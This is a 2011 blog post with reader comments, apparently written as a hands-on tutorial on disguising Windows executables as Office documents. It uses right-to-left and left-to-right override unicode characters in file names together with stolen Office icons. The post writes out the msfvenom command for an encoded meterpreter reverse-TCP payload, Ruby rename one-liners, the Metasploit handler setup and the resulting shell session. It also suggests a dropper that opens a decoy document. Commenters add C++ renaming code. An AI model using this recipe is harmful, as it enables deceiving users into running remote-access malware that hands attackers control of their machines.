Monday, October 24, 2011

Social engineering with unicode filenames

There have been several reports on special unicode characters being used to hide the real extension of a file - most times to make an execute file look like a document or a picture file, tricking the user into starting the executable.

Although the attack is not new, I could not find much information about good ways to create such files - so here is how I created a meterpreter payload and made it look like a normal file on Windows Vista/7.
During the process, I accessed the files both from Linux (metasploit, ruby) and Windows (Resource Hacker) using a Virtual Box machine with a shared folder. It should be possible to do everything on Windows only, but I did not test it.

[update 2011-11-04]
I just tested the examples with Windows 7 + Ruby 1.9.2. As a reader reported in the comments, the original examples do not work. Ruby 1.9.2 has improved unicode support, so we can use the \uXXXX codes directly - I added an alternative version of the commands.

First, create a payload:

./msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -f exe LHOST= LPORT=4444 >/tmp/demo.exe

To make the file look like our target format, we need to give the executable file an icon. Copy demo.exe to demo_doc.exe and demo_ppt.exe to create a Word and a Powerpoint template.

Now we need to find the correct icons for these filetypes. Start Resource Hacker ( and open the Word executable holding the icons ("c:\program files\microsoft office\office14\wordicon.exe" on my system). Find a suitable icon group and note the corresponding values (resource name = 201 and language = 1033 in my case). Resource Hacker showed some error messages on my system, but it worked nonetheless.

Now open your payload (demo_doc.exe) file in Resource Hacker. Click "Action -> Add a new Resource".  Open the file holding the icon (wordicon.exe in my case), set resource type to "ICON" and enter the collected values.
If you use an executable that already has an icon (e.g. when executing msfvenom with calc.exe as a template), use "Action -> Replace Icon".

Click "Add Resource" and save the file.

Repeat the process for the Powerpoint file. I used the file powerpnt.exe, resource name = 1301, language = 1033.

This is what you should see in Windows Explorer:

Theoretically, you could first rename the files before editing the icon resources. However, in my tests Resource hacker did not work correctly with the unicode filenames, so I recommend doing it in the described order.

The most used character for these tricks is "right-to-left override" (RTLO), in unicode: U+202E.
First, we need to convert this into an UTF-8 representation. You can do this by hand, like described here:, or you can just look it up:

So, U+202E converts to 0xE280AE.
With a simple RTLO, we can reverse the right side of the filename, so "cod.exe" looks like "exe.doc". We are quite limited here, as the name of the file needs to end on exe.

One good example I found was a file displayed as "SexyAlexe.ppt". The real name of this file is "SexyAl\xe2\x80\xaetpp.exe".

I used ruby to execute the rename commands, as the special characters sometimes cause problems if you try to execute them in a normal shell.

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "SexyAl\u202Etpp.exe")'

In Windows Explorer:

For more advanced file names, we need a second unicode character: U+202D = 0xE280AD, this one is called left-to-right override (LTRO).

Using this, the real file extension of the file can be placed anywhere in the displayed filename. We now also use .scr as extension to have more options.

# [RTLO]cod.yrammus_evituc[LTRO]2011.exe

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_doc.exe", "\xe2\x80\xaecod.yrammus_evituc\xe2\x80\xad2011.exe")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_doc.exe", "\u202Ecod.yrammus_evituc\u202D2011.exe")'

# [RTLO]tpp.stohsnee[LTRO]funny.scr

# Original version, tested on Linux with Ruby 1.8.7
ruby -e 'File.rename("demo_ppt.exe", "\xe2\x80\xaetpp.stohsnee\xe2\x80\xadfunny.scr")'

# Alternative version, tested on Windows 7 with Ruby 1.9.2
ruby -e 'File.rename("demo_ppt.exe", "\u202Etpp.stohsnee\u202Dfunny.scr")'

The filename is created in two parts, first writing from right to left and then from left to right, prepending the characters left of all those already written.


Open a metasploit console on the attacking machine:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST
msf  exploit(handler) > exploit
Now, open one of the created files on the target machine and you should get a meterpreter shell:
[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at Sun Oct 23 19:42:30 +0200 2011
Of course, no document will be opened and some users might get suspicious. An advanced version of this attack would use an executable file that extracts an embedded document, opens it and then executes the reverse shell.


  1. At first I thought this is going to be easy in VC++ 2010 "rename() or CopyFile()".

    but...It isn't, dealing with UNICODE filenames in C turned out to be not straight forward.

    Will really appreciate some help if someone managed to do this in C(++).

  2. Great job.

    But sending "funny.screenshot.doc" with a Powerpoint icon is not that discrete :)

    Anyways we both know that´s just a detail, great post, man.

  3. I figured out how to do it in C++, using _wrename() instead of rename()

    compile the following code and place test.exe in the same directory, then execute

    int main(int argc, char* argv[])
    int result;
    const wchar_t* wide_oldname = L"test.exe";

    wchar_t newname[] = L"Presentation_Al"
    L"tpp.exe"; //RTOL Unicode, keep as is

    result = _wrename( wide_oldname , newname );
    if ( result == 0 )
    puts ( "File successfully renamed" );
    perror( "Error renaming file" );
    return 0;

    1. Total Commander shows the file name properly - as EXE file

  4. [RLO] Unicode character REALLY confuses windows :) "Try to read the error message"

  5. @Julio:
    thanks for the hint - I just corrected that.

    This might be useful to create a loader program that extracts & opens a real office file and then executes a payload, thanks for sharing your code and the nice error message :)

  6. I tried this on Windows 7 Professional x64 with Ruby ver 1.9.2. I tried to reproduce the example i.e. tried renaming a file from "demo_ppt.exe" to "SexyAlexe.ppt". But unexpectedly I get:


    when I execute:

    ruby -e 'File.rename("demo_ppt.exe", "SexyAl\xe2\x80\xaetpp.exe")'

    Why doesn't it work? Am I missing something?

  7. The ruby being used in the blog post is under linux.

    the windows version of ruby will output "THREE" charachters xe2 & x80 & xae, not the "xe280ae" single charachter.

    this is maybe because of the cmd.exe?
    under windows, just use the charmap.exe!!

  8. Thanks. It seems to be fine now. :)

  9. Strangely,


    produces "SexyAlexe.ppt" where as




    on Backtrack 5 R1 (1.9.2). Same filename on Windows 7 x64.


  10. I also had the described problem when trying this on Windows 7 + Ruby 1.9.2.
    Ruby 1.9.2 has improved unicode support and uses different libraries on Windows than version 1.8.x.

    It is possible to use the \uXXXX codes directly without converting them UTF-8 - I updated the examples in the post accordingly.